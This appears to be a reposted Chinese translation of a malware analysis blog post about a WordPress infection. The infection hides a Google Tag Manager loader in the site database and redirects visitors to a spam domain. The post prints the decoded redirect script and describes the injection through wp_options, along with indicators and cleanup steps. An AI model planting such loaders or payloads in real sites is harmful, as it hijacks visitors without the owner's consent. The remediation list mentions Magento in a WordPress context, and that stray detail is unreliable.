揭露隐藏在Google Tag Manager代码中的WordPress重定向恶意软件

WordPress重定向恶意软件隐藏在Google Tag Manager代码中

Puja Srivastava / 2025年7月17日

上个月，一位客户在发现其WordPress网站意外重定向至一个垃圾域名后联系了我们。重定向发生在用户访问网站大约4-5秒后。

通过对网站源代码的仔细检查，我们发现了一个可疑的Google Tag Manager加载项。

这不是我们第一次看到GTM被滥用。今年早些时候，我们分析了一次信用卡盗刷攻击，攻击者通过GTM容器注入了支付嗅探器。

这篇博客文章详细介绍了我们对此次攻击活动的全面调查，包括其注入方式、工作原理以及我们如何将其清除。

我们发现了什么？

感染并非存在于主题或插件文件中，而是直接隐藏在WordPress数据库内部。攻击者使用他们控制的一个容器ID，注入了一段看似合法的Google Tag Manager脚本。

被注入的代码从以下地址加载一个远程JavaScript文件：
https://www.googletagmanager.com/gtm.js?id=GTM-PL2J2GLH

该脚本将用户重定向到当前已知与垃圾邮件活动相关的域名spelletjes[.]nl。通过进一步分析，我们发现这个GTM容器被用于超过200个受感染的网站（根据PublicWWW的数据）。

攻击者将此代码添加到了wp_options表（选项名称为ihaf_insert_body）和wp_posts表中。

这使得攻击者无需访问文件系统即可执行恶意行为，使得基于文件的标准扫描器更难检测到感染。

攻击向量与入侵指标 (IoCs)

注入的脚本使用容器IDGTM-PL2J2GLH，并加载以下远程文件：
hxxps://www[.]googletagmanager[.]com/gtm.js?id=GTM-PL2J2GLH

一旦加载，该脚本会使用JavaScript执行客户端重定向。整个负载由攻击者通过其GTM账户完全控制。由于它托管在广泛使用的服务googletagmanager.com上，因此这种重定向避开了许多常见的安全过滤器。

恶意软件分析

注入wp_options的 JavaScript

攻击者将以下代码放置在wp_options表的option_value中，使用的option_name值为ihaf_insert_body(ihaf代表“插入页眉和页脚”，该插件现称为 wpcode)。这很可能是由于管理员账户被入侵，通过wp-admin面板插入的。

此加载器的目的是从Google的CDN获取外部JavaScript，随后在客户端执行重定向。

GTM 容器中的恶意重定向脚本

最终发现，由攻击者远程托管和控制的负载中包含恶意重定向脚本。
\u003Cscript type=\"text\/gtmscript\"\u003Ewindow.location.href=\"https:\/\/www.spelletjes[.]nl\/\";\u003C\/script\u003E

这个Unicode转义字符串解码后为：
<script type="text/gtmscript">window.location.href="https://www.spelletjes.nl/";</script>

恶意软件的影响

这种感染导致网站访问者被强制重定向到spelletjes[.]nl，这是一个提供广告和游戏的网站。
重定向损害了用户信任和SEO，降低了转化率，并可能导致您的网站被安全扫描器或浏览器警告标记。此外，由于负载隐藏在看似合法的GTM脚本中，因此极具欺骗性。

修复步骤

要修复基于Google Tag Manager的恶意软件：

1. 移除任何可疑的GTM标签。登录GTM，识别并删除任何可疑标签。
2. 执行全面的网站扫描，以检测任何其他恶意软件或后门。
3. 移除任何恶意脚本或后门文件。
4. 确保Magento和所有扩展程序都更新了安全补丁。
5. 定期监控网站流量和GTM中的任何异常活动。
6. 使用双因素身份验证保护wp-admin。

结论

这次攻击是一个绝佳的例子，说明了像Google Tag Manager这样的合法服务如何被网络犯罪分子滥用。通过将受信任的脚本标签放入数据库（很可能是由于wp-admin用户被入侵），并将其隐藏在显而易见的地方，攻击者能够远程控制网站并将流量重定向到可疑目的地，而无需修改任何主题文件。

如果您遇到重定向或怀疑您的网站已被入侵，我们的恶意软件研究团队可24/7为您提供帮助。

Puja Srivastava 是一名安全分析师，热衷于对抗新的和未被检测到的恶意软件威胁。在恶意软件研究和安全领域拥有超过7年的经验，Puja 磨练了她在检测、监控和清理网站恶意软件方面的技能。她的职责包括网站恶意软件修复、培训、交叉培训以及指导新员工和其他部门的分析师，以及处理升级问题。工作之余，Puja 喜欢探索新的地方和美食，在厨房尝试新食谱，以及下棋。
jZsKZdINXrVc9QY8XQ5Ax/HmrWATJet1GxUy2jBZcmN/p/QbTGvJP/lXL/a7Ct5kPyXdJaSn4iVPFPDiq0Hwiwo3Ks8eEMVD0x5ue5NKNUPeK1YQH4KDrM/4apRjN8+ejHuDQuvrhU552dugHgHdSw==
更多精彩内容 请关注我的个人公众号 公众号（办公AI智能小助手）
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号（网络安全技术点滴分享）